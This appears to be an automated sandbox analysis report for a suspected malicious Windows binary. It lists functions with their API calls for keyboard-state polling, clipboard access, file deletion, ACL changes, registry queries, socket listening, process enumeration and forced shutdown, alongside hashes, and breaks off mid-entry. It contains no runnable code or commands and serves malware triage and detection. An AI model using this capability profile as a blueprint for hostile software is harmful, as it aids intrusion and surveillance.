                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                        • String ID: *.*
                                                                                        • API String ID: 3566783562-438819550
                                                                                        • Opcode ID: f167a5d96718f2a0cc73b8cad36d0a59e677c32395f2cc49012768cfcaa2ff6b
                                                                                        • Instruction ID: a881d162e9284e1acc5192da803a215f5fbb0646d9ed1f29a98e3bc440d57423
                                                                                        • Opcode Fuzzy Hash: f167a5d96718f2a0cc73b8cad36d0a59e677c32395f2cc49012768cfcaa2ff6b
                                                                                        • Instruction Fuzzy Hash: 08618C725043099FD710EF60C851AAEB3E8FF89320F04891EF999D7252DB35E945DB92
                                                                                        Function 00F1A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F1ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00F1ABD7
                                                                                          • Part of subcall function 00F1ABBB: GetLastError.KERNEL32(?,00F1A69F,?,?,?), ref: 00F1ABE1
                                                                                          • Part of subcall function 00F1ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00F1A69F,?,?,?), ref: 00F1ABF0
                                                                                          • Part of subcall function 00F1ABBB: HeapAlloc.KERNEL32(00000000,?,00F1A69F,?,?,?), ref: 00F1ABF7
                                                                                          • Part of subcall function 00F1ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00F1AC0E
                                                                                          • Part of subcall function 00F1AC56: GetProcessHeap.KERNEL32(00000008,00F1A6B5,00000000,00000000,?,00F1A6B5,?), ref: 00F1AC62
                                                                                          • Part of subcall function 00F1AC56: HeapAlloc.KERNEL32(00000000,?,00F1A6B5,?), ref: 00F1AC69
                                                                                          • Part of subcall function 00F1AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F1A6B5,?), ref: 00F1AC7A
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F1A6D0
                                                                                        • _memset.LIBCMT ref: 00F1A6E5
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F1A704
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00F1A715
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00F1A752
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F1A76E
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00F1A78B
                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F1A79A
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00F1A7A1
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F1A7C2
                                                                                        • CopySid.ADVAPI32(00000000), ref: 00F1A7C9
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F1A7FA
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F1A820
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F1A834
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3996160137-0
                                                                                        • Opcode ID: df0b778af5f0b0f91e374fef862d47fe304d6e00dc2786efe17c9a0d930a04e5
                                                                                        • Instruction ID: 717d14855110a35038ed7fad54dea03d8d36fd30404c185e5959d95c036e4328
                                                                                        • Opcode Fuzzy Hash: df0b778af5f0b0f91e374fef862d47fe304d6e00dc2786efe17c9a0d930a04e5
                                                                                        • Instruction Fuzzy Hash: 83514E71E01109BBDF10DF95DC44AEEBBB9FF04320F048129F921A7291DB759A46EB61
                                                                                        Function 00F263F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F26EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F25FA6,?), ref: 00F26ED8
                                                                                          • Part of subcall function 00F272CB: GetFileAttributesW.KERNEL32(?,00F26019), ref: 00F272CC
                                                                                        • _wcscat.LIBCMT ref: 00F26441
                                                                                        • __wsplitpath.LIBCMT ref: 00F2645F
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00F26474
                                                                                        • _wcscpy.LIBCMT ref: 00F264A3
                                                                                        • _wcscat.LIBCMT ref: 00F264B8
                                                                                        • _wcscat.LIBCMT ref: 00F264CA
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00F264DA
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F264EB
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F26506
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                        • String ID: \*.*$p1#v`K$v
                                                                                        • API String ID: 2643075503-1732502266
                                                                                        • Opcode ID: 9c2dfce644a82f3041adb11eb49fd24c3033fbbe10387b8dd5b5a2815a16ec63
                                                                                        • Instruction ID: 8d15fa597d63fc11be1ce21edd8a97214257433736a8537d973cdcecd12380ef
                                                                                        • Opcode Fuzzy Hash: 9c2dfce644a82f3041adb11eb49fd24c3033fbbe10387b8dd5b5a2815a16ec63
                                                                                        • Instruction Fuzzy Hash: A831C5B28083889AD721EBE49C85EDBB7DCAF55310F04491EF5D8C3141EA35D50DA767
                                                                                        Function 00EE6F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                        • API String ID: 0-4052911093
                                                                                        • Opcode ID: 20c8c214c4ef725502c0a3297978f4938f1046441b22e092c4021e427677783c
                                                                                        • Instruction ID: d482ccd11571577874015739e68b41f13b6d042d32ad5484cb847d7cdf21f6ba
                                                                                        • Opcode Fuzzy Hash: 20c8c214c4ef725502c0a3297978f4938f1046441b22e092c4021e427677783c
                                                                                        • Instruction Fuzzy Hash: 73728F71E042599BDF24CF59C8807AEB7B5BF58310F14816AE859FB281DB709E41EB90
                                                                                        Function 00F431BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F42BB5,?,?), ref: 00F43C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F4328E
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F4332D
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F433C5
                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F43604
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F43611
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1240663315-0
                                                                                        • Opcode ID: ca92874701eda5954b81a8e11c4fa96684711c9aed8257e980cba3176adc9f31
                                                                                        • Instruction ID: 40140b4a1dae4a5d4a0c07e02d1b664dd079f90b1b36f8bd48f98fb4c6631a5b
                                                                                        • Opcode Fuzzy Hash: ca92874701eda5954b81a8e11c4fa96684711c9aed8257e980cba3176adc9f31
                                                                                        • Instruction Fuzzy Hash: E3E15E31604215AFCB14DF29C995E2ABBE8EF88320F04856DF95AD7262DB30ED05DB52
                                                                                        Function 00F22B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 00F22B5F
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00F22BE0
                                                                                        • GetKeyState.USER32(000000A0), ref: 00F22BFB
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00F22C15
                                                                                        • GetKeyState.USER32(000000A1), ref: 00F22C2A
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00F22C42
                                                                                        • GetKeyState.USER32(00000011), ref: 00F22C54
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00F22C6C
                                                                                        • GetKeyState.USER32(00000012), ref: 00F22C7E
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00F22C96
                                                                                        • GetKeyState.USER32(0000005B), ref: 00F22CA8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: 6ed6e767034c4ca227f9fc4f3fa6f3deecd4eebf251153074144433ac09e904e
                                                                                        • Instruction ID: d1d9bef58660e724eddc18b16e377ad6748d6b7ebd0d138080d8a30487e14cdb
                                                                                        • Opcode Fuzzy Hash: 6ed6e767034c4ca227f9fc4f3fa6f3deecd4eebf251153074144433ac09e904e
                                                                                        • Instruction Fuzzy Hash: 4D411630E447E93DFFB19B60A8143BDBEA06B11334F084049D9C2566C1DBA49DC4E7A2
                                                                                        Function 00F36D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1737998785-0
                                                                                        • Opcode ID: c54b135503bd007de63da8dd5f462b23c8dfd1880f94fa2c2c09975d8317bc87
                                                                                        • Instruction ID: b66aa1aa2d0a6de853c2771906c0060b36b32bbd142d81140e806e0dca14ee0c
                                                                                        • Opcode Fuzzy Hash: c54b135503bd007de63da8dd5f462b23c8dfd1880f94fa2c2c09975d8317bc87
                                                                                        • Instruction Fuzzy Hash: F9219F31700118AFDB11AF65DC49B2EB7A8FF44720F05C019FA1ADB2A1CB75E900ABA0
                                                                                        Function 00F3C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F19ABF: CLSIDFromProgID.OLE32 ref: 00F19ADC
                                                                                          • Part of subcall function 00F19ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00F19AF7
                                                                                          • Part of subcall function 00F19ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00F19B05
                                                                                          • Part of subcall function 00F19ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00F19B15
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00F3C235
                                                                                        • _memset.LIBCMT ref: 00F3C242
                                                                                        • _memset.LIBCMT ref: 00F3C360
                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00F3C38C
                                                                                        • CoTaskMemFree.OLE32(?), ref: 00F3C397
                                                                                        Strings
                                                                                        • NULL Pointer assignment, xrefs: 00F3C3E5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                        • String ID: NULL Pointer assignment
                                                                                        • API String ID: 1300414916-2785691316
                                                                                        • Opcode ID: 0146b7f0c04ce3712e111a2872fa2e4271c7eddbece629289db8e54ccfd0173d
                                                                                        • Instruction ID: 0880857a09cab87bf3ff97494b1968ee31c9d449353a5b1a8d5d954f456b5410
                                                                                        • Opcode Fuzzy Hash: 0146b7f0c04ce3712e111a2872fa2e4271c7eddbece629289db8e54ccfd0173d
                                                                                        • Instruction Fuzzy Hash: C5913C71D00218ABDB10DFA5DC55EDEBBB8EF04720F10815AF519B7291DB709A45DFA0
                                                                                        Function 00F279D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F1B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F1B180
                                                                                          • Part of subcall function 00F1B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F1B1AD
                                                                                          • Part of subcall function 00F1B134: GetLastError.KERNEL32 ref: 00F1B1BA
                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00F27A0F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                        • API String ID: 2234035333-194228
                                                                                        • Opcode ID: f82385a65a32fa3d98056ef2938b7e4ac7f7425a90a8350f1f90860828052002
                                                                                        • Instruction ID: 6d94242d616cff49e15d3c147c96ddea749a75c9356be7ca368c77f476d87177
                                                                                        • Opcode Fuzzy Hash: f82385a65a32fa3d98056ef2938b7e4ac7f7425a90a8350f1f90860828052002
                                                                                        • Instruction Fuzzy Hash: EF01F772B593766BF7287668AC5BBBF32589B00770F140424F913E20E2D5AC9E00B5A4
                                                                                        Function 00F38C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F38CA8
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F38CB7
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00F38CD3
                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00F38CE2
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F38CFC
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00F38D10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                        • String ID:
                                                                                        • API String ID: 1279440585-0
                                                                                        • Opcode ID: 7d8b857bc672ec37848d1b5ba1b58b75d06fba51d2bd58d3df76275840415ea4
                                                                                        • Instruction ID: 18e7f1b1447ab5b6bfe179a72b95bf2cefddfa8483b30596f437dd1426a841cf
                                                                                        • Opcode Fuzzy Hash: 7d8b857bc672ec37848d1b5ba1b58b75d06fba51d2bd58d3df76275840415ea4
                                                                                        • Instruction Fuzzy Hash: 9321D331A002059FCB10EF68DD45B6EB7E9EF48760F108158FA56A73D2CB74AD42AB61
                                                                                        Function 00F26532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00F26554
                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F26564
                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00F26583
                                                                                        • __wsplitpath.LIBCMT ref: 00F265A7
                                                                                        • _wcscat.LIBCMT ref: 00F265BA
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00F265F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                        • String ID:
                                                                                        • API String ID: 1605983538-0
                                                                                        • Opcode ID: e09bb33c83ac044ab06aed7746fac4764c96318bff5d62c211641aff3f244cb0
                                                                                        • Instruction ID: eba680155bd663a543277578765c4304a04242244af077e2b011c54eefc0d127
                                                                                        • Opcode Fuzzy Hash: e09bb33c83ac044ab06aed7746fac4764c96318bff5d62c211641aff3f244cb0
                                                                                        • Instruction Fuzzy Hash: 1221A771E00218ABDB10ABA4DC89FEEB7BCEB09310F5400A5F505D3141DBB59F85EB60
                                                                                        Function 00F3923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F3A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00F3A84E
                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00F39296
                                                                                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00F392B9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 4170576061-0
                                                                                        • Opcode ID: cfc2380cd6a98cccf95770ad77dc2a7460f2dd3ad8b8f18ecdb5921ddb9166b7
                                                                                        • Instruction ID: b0f704cb47338874e62a4389267ce70fa4e2f7e40b8ec91ed25423ba7e44056c
                                                                                        • Opcode Fuzzy Hash: cfc2380cd6a98cccf95770ad77dc2a7460f2dd3ad8b8f18ecdb5921ddb9166b7
                                                                                        • Instruction Fuzzy Hash: 7641B171A00608AFDB10AB68CC42E7E77EDEF48724F14454CFA56AB2D2DBB49D019B91
                                                                                        Function 00F2EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00F2EB8A
                                                                                        • _wcscmp.LIBCMT ref: 00F2EBBA
                                                                                        • _wcscmp.LIBCMT ref: 00F2EBCF
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00F2EBE0
                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F2EC0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 2387731787-0
                                                                                        • Opcode ID: efaec3a6cd6e87083bf74dc7bad848c85c96ee39d5ca6453570fc02f207ad018
                                                                                        • Instruction ID: 98dc805c7ade232cfa7abf7fd3c6f849641ff8331a27fc39f89b875efd2de861
                                                                                        • Opcode Fuzzy Hash: efaec3a6cd6e87083bf74dc7bad848c85c96ee39d5ca6453570fc02f207ad018
